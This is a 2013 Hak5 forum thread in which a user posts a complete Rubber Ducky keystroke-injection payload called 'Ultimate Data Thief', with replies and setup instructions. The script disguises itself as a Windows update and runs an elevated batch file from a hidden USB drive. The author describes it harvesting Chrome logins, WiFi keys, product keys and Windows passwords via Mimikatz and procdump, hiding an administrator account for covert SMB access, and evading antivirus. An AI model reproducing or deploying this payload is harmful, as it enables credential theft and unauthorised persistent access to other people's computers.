UnKn0wnBooof Posted October 25, 2013 Share Posted October 25, 2013 Ok, so there's a lot of cool Ducky scripts out there, my personal favourite is the script that steals Windows passwords - AWSOME!!! But do any scripts aim to get more than just a Windows password? Do any of them "Backup" Google Chrome Login Data, WiFi keys, Windows Product Keys or Replace the Administrator password or even hide the account so you can have "stealthy" remote access via Windows Shares (Known as SMB)? I THINK PAYLOADS SHOULD DO MORE! So... I introduce the ULTIMATE DATA THEIF!!! Payload: DELAY 15000REM Author: Lavanoid VolcanicREM This script supports Windows XP as well as Vista and 7.REM I don't have Windows 8 (I really want it though) so I cant test it.REM This Script looks for the drive named "JUNK" because "DUCKY" is too exposing.GUI dDELAY 500GUI rDELAY 1500STRING notepad.exeDELAY 200ENTERDELAY 1500STRING @echo offDELAY 200ENTERDELAY 200STRING TiDELAY 200STRING tle = Installing Windows Update...DELAY 200ENTERSTRING @echo Installing Windows Update...DELAY 200ENTERSTRING set duck=DELAY 200ENTERSTRING COLOR F0DELAY 200ENTERSTRING :startDELAY 200ENTERSTRING if not "%LOCALAPPDATA%"=="" goto win_newDELAY 200ENTERSTRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "JUNK"') do set duck=%%ADELAY 200ENTERSTRING if "%duck%"=="" goto startDELAY 200ENTERSTRING set duck=%duck%:DELAY 200ENTERSTRING %duck%DELAY 200ENTERSTRING CD "Data"DELAY 200ENTERSTRING "SCRIPT_EX.exe" "SP.bat"DELAY 200ENTERSTRING EXITDELAY 200ENTERSTRING :win_newDELAY 400ENTERDELAY 400STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "JUNK"') do set duck=%%dDELAY 200ENTERSTRING if "%duck%"=="" goto startDELAY 200ENTERSTRING %duck%DELAY 200ENTERSTRING CD "Data"DELAY 200ENTERSTRING "SCRIPT_EX.exe" "SP.bat"DELAY 200ENTERSTRING EXITDELAY 200ENTERCTRL SDELAY 1500STRING %TEMP%\DS.batDELAY 1000ENTERDELAY 600ALT YDELAY 700ALT F4GUI rDELAY 1500STRING %TEMP%\DS.batENTERDELAY 1000ALT yDELAY 500ALT yDELAY 500ALT yDELAY 500ALT yDELAY 500ALT yDELAY 500ALT yDELAY 500ALT yGUI rDELAY 1200STRING explorer.exeENTERDELAY 1500ALT F4 Unfortunately, the forum only allows a maximum of 500kb of upload space and the extra data is just over 1MB so I put the file on my Dropbox account instead. Link: https://www.dropbox.com/sh/ad8jegywipd3l76/jo2KqlU3CB READ ME!!.txt contents: SCRIPT/PAYLOAD BY LAVANOID VOLCANIC THE DIRECTORIES ABOVE OR BELOW (DEPENDING ON YOUR CONFIGURATION) SHOULDBE COPIED TO THE ROOT DIRECTORY OF THE DUCKY DRIVE. YOU SHOULD EDITTHE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS. FILE LOCATIONS: SP.bat -- Data\SP.batinject.txt -- Scripts\Projects\Steal_Data\inject.txtCompiler.bat -- Scripts\Compiler.bat COMPILER.bat description: The compiler batch file basically takes away the hassle of enteringall those annoying time draining commands. If the Compiler.bat fileis stored on the Duck, the compiler will ask if you want to install iton the Duck. WHAT I HOPE: I hope that my project will be featured in one of the Hak5 videossince I do like some attention. THIS WORLD IS LONELY YOU KNOW!! Thank you for choosing to spend a bit of your time bypoking your nose into my work. Quote Link to comment Share on other sites More sharing options...
Lord_humungus Posted October 25, 2013 Share Posted October 25, 2013 I love a modest person! Quote Link to comment Share on other sites More sharing options...
mw3demo Posted October 26, 2013 Share Posted October 26, 2013 I love passive-aggressiveness! Back on topic, well done Lavanoid! You probably put a bunch of effort into this, and I will give it a test in the near future. Good work doesn't need huge PR though, just look at the Rubber Ducky, and Wifi Pineapple. Your work will get attention if its good at what it does, just keep putting the hard work in! Good job. Quote Link to comment Share on other sites More sharing options...
ITHKS Posted October 26, 2013 Share Posted October 26, 2013 I will test this later today and give you my thoughts on it! Great work so far! Keep it up Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted October 26, 2013 Author Share Posted October 26, 2013 (edited) Just updated the "Backup_Eraser.bat" , "SP.bat" and "Data.zip" file. Just download and extract the "Data.zip". Changes: Backup_Eraser.bat - Forgot to replace the directory variable with "Backups", it was set as "Pass" so it wouldn't locate any backups. SP.bat - Minor bug fixes and spelling corrections. I misspelt "process_dump" by adding an extra character. Previous value: proccess_dump. Whoops. Edited October 26, 2013 by Lavanoid Quote Link to comment Share on other sites More sharing options...
hzm74 Posted October 27, 2013 Share Posted October 27, 2013 Hello, Can you explain a little bit more how all the included files work together?! What to do to get it work? Do I have to run compiler.bat manually? Do I have to run it to configure the payload (inject.bin)? When I wan't to run the payload, do I need to plugin an extra usb named "JUNK" to get the info copied to this drive? YOU SHOULD EDITTHE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS. <- What exactly do I need to edit? Thnx. A little step by step tutorial would help. HzM74 Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted October 28, 2013 Author Share Posted October 28, 2013 Basically, you run the compiler.bat to compile the inject.txt file into a inject.dat file. The file will be saved in the same directory as the .txt. Just place your ducky scripts in 'Data\Projects\<name of project>' and the file MUST be named 'inject.txt'. The compiler will install on any USB drive as long as it is stored on a USB drive-the name doesn't matter. I used some special variables so the compiler knew what drive it is stored on. The sp.bat file has a few "triggers" inside of it. Just open it with a notepad editor (I use notepad++) and change the configuration part of it. There is a variable called "avoid_antivirus" and by default that is set as true so you can set it as false if you wish. When it's set as true, some command's won't execute such as Chromepass, Mimikatz, etc. However, you can enable the proc_dump program (by changing the other variables) to avoid antivirus, but still get a users password. inject.txt was designed to find the drive 'JUNK' so you can edit it so it will find a different label instead. It doesn't have to be named 'JUNK'. If you open some of the other files in a text editor, you should be able to figure out what they do. Just extract data.zip and place all the files on the duck. SP.bat is executed by 'SCRIPT_EX.exe' which has an Administrator manifest so you don't need the Powershell. SCRIPT_EX.exe is launched by the inject.dat file (payload). The compiler is just a tool designed to make your duck experience easier. Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted October 28, 2013 Author Share Posted October 28, 2013 You also need the Twin Duck firmware (forgot to mention). If you don't want to use twin duck, then just put the 'Data' directory on another drive called "JUNK" or whatever you set the drive label as. The compiler should be stored on the duck if you want to install a payload directly on the duck. Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted October 31, 2013 Author Share Posted October 31, 2013 Created a new topic. Wouldn't let me edit this one - bummer. Link: https://forums.hak5.org/index.php?/topic/30740-payload-ultimate-data-theif-new/ Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.